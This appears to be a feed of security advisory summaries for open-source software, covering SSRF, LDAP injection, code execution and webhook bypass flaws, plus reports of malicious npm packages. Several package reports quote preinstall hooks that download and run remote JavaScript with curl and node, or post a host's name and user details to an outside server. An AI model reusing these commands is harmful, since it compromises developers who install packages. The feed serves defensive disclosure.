GHSA-C556-Q2MH-477V OpenAM Authenticated Server-Side Request Forgery (SSRF) via `/sessionservice`
OpenAM Open Identity Platform is an open-source Identity and Access Management (IAM) platform derived from ForgeRock OpenAM, providing SSO, OAuth2, SAML, and OpenID Connect capabilities. It is widely deployed in enterprise environments as a central authentication gateway. The /sessionservice...
GHSA-W56X-9778-RPPX xwiki-pro-macros has remote code execution from page title and content via excerpt-include macro
Summary The excerpt-include macro does not properly escape the title of the included page and executes the content of the excerpt with the macro's rights. Therefore, it is vulnerable to XWiki syntax injection via the included page's title and content, allowing remote code execution for any user w...
GHSA-XJVP-4FHW-GC47 runc: Malicious image with /dev symlink can trigger limited host filesystem integrity violations
Impact When setting up the container rootfs, setupPtmx and setupDevSymlinks call os.Remove and os.Symlink with a filepath.Join string which allow an image with /dev as a symlink to trick runc into deleting files called ptmx on the host or creating a hardcoded set of symlinks with specific names a...
GHSA-2VG8-Q4C2-5CW3 OpenAM has LDAP Injection via `_queryId` Parameter
OpenAM Open Identity Platform is an open-source IAM platform providing SSO, OAuth2, SAML, and OpenID Connect capabilities. The CREST REST API layer exposes user query endpoints under /json/realm/users. In IdentityResourceV1.queryCollection, the HTTP query parameter queryId is passed to a CrestQue...
GHSA-95JH-7R58-XMXW AVideo has an Authorize.Net Webhook Signature Bypass that Enables Wallet Balance Inflation via Forged Payment Data
Summary The Authorize.Net webhook handler at plugin/AuthorizeNet/webhook.php contains a signature verification bypass that allows an attacker to forge webhook requests with arbitrary payment amounts and target user IDs. By supplying a valid transaction ID from a small legitimate purchase, the...
GHSA-95PQ-HR8P-F5G7 ComfyUI-Manager has an Unprotected Alternate Channel (CWE-420)
Impact An Unprotected Alternate Channel (CWE-420) vulnerability was discovered in ComfyUI-Manager versions prior to 3.38. Vulnerability Details In affected versions, ComfyUI-Manager stored its configuration in the user/default/ComfyUI-Manager/ directory, which was accessible via ComfyUI's web APIs...
GHSA-WF69-R4MX-43RR AVideo Vulnerable to Unauthenticated .env File Exposure via Official Docker Compose Configuration
Vulnerability Details CWE: CWE-538 - Insertion of Sensitive Information into Externally-Accessible File or Directory The official docker-compose.yml line 61 mounts the entire project root directory as the Apache document root: `volumes: - "./:/var/www/html/AVideo"` This causes the .env file —...
MAL-2026-6267 Malicious code in vitest-cli (npm)
Source: amazon-inspector 27abcc7f2373309feb253b0cc48b1a8bae7c54a3c43aed0c57add697f4067aba. Package name vitest-cli impersonates the official Vitest project while declaring empty author, homepage, repository, and bugs metadata. The...
MAL-2026-6270 Malicious code in zomato-mcp (npm)
Source: amazon-inspector a23c3c63a9064636250be7dffa3781af0f9cdfcfd11a8da875be470c6952033e. On npm install, the package's preinstall lifecycle script runs curl against http://d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site/install/ carrying the...
MAL-2026-6269 Malicious code in zomato-espresso (npm)
Source: amazon-inspector 860464bbcd3d56375d93025e494e39a6652bb7d115fb581ee088474a66786c3d. Package is a dependency-confusion lure targeting Zomato's internal namespace. package.json declares a preinstall hook that runs curl on every npm...
MAL-2026-6268 Malicious code in zomato-core (npm)
Source: amazon-inspector d5042b2ca8b8b3ba1f073344762615dc532864913af3f54a16540d44dde97ba5. package.json declares a preinstall lifecycle hook that runs curl to POST the installer's hostname, whoami output, current working directory, and the...
MAL-2026-6265 Malicious code in sn-internal-testjgsakjdkjadkjah (npm)
Source: amazon-inspector fd1a751946e8be92bbd0b675c57b3389e1e54919a69f5f6fef414a16cc2f1261. package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On npm install, th...
MAL-2026-6266 Malicious code in test-package-sajsdkashdj (npm)
Source: amazon-inspector 62645375d713992c0b37f646ed3cf898e0ea2b56777ca1b531b3d6ee61d93b87. package.json declares a preinstall lifecycle script: "curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js". On every npm install, the...
GHSA-8J8M-P79X-G4JM AVideo's Privilege Escalation via Unguarded Permission Parameters in signUp API Allows Self-Granting Upload/Stream/Meet Permissions
Summary The setapisignUp method in the API plugin accepts emailVerified, canUpload, canStream, and canCreateMeet parameters from user-supplied input and applies them to newly created accounts without verifying that the request was authenticated with a valid APISecret. Any anonymous user who can...
GHSA-FJJ5-V948-WHJJ Mise Vulnerable to Arbitrary Code Execution via Tera Templates in .tool-versions Files (Trust Bypass)
Summary Mise processes .tool-versions files through the Tera template engine during parsing, with the exec function registered, enabling arbitrary command execution. Unlike .mise.toml files, .tool-versions files are not subject to trust verification in non-paranoid mode. This means an attacker ca...